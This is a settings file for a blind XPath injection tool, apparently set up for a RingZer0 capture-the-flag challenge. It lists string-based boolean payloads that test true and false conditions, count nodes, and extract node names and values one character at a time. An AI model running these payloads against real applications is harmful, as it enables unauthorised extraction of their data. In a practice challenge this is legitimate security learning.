[settings]

charset=0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz- _.,@#'"

condition=true

keyword_true=keyword

keyword_false=

url=https://ringzer0ctf.com/challenges/83/?u=/

request_type=get

parameters=

post_parameters=param=123

proxy_server_ip=localhost

proxy_server_port=8080

proxy_in_use=false

curl_in_use=false

custom_http_header=Cookie: test=123

custom_http_header_in_use=false

exploitation_type=string-based

extract_node_value=true

extract_attributes=true

extract_comments=true


[advanced_settings]

#-------------------------------------------- test "TRUE" condition
test_payload_condition_true=' and '1'='1

#-------------------------------------------- test "FALSE" condition
test_payload_condition_false=' and '1'='2




#-------------------------------------------- max number of child nodes to be searched (to avoid endless counting)
max_child_nodes_to_search=20

#-------------------------------------------- returns number of child nodes available
payload_nr_of_child_nodes=' and count(<node_name>)=<iterator> and '1'='1





#-------------------------------------------- max length of the node name (to avoid endless counting)
max_nodename_length=20

#-------------------------------------------- returns length of the node name
payload_get_nodename_length=' and string-length(name(<node_name>))=<iterator> and '1'='1

#-------------------------------------------- returns the node name
payload_get_nodename=' and substring(name(<node_name>),<character_position>,1)='<character>' and '1'='1




#-------------------------------------------- max length of the node value (to avoid endless counting)
max_nodevalue_length=20

#-------------------------------------------- returns length of the node name
payload_get_nodevalue_length=' and string-length(<node_name>)=<iterator> and '1'='1

#-------------------------------------------- returns the node value
payload_get_nodevalue=' and substring(<node_name>,<character_position>,1)='<character>' and '1'='1


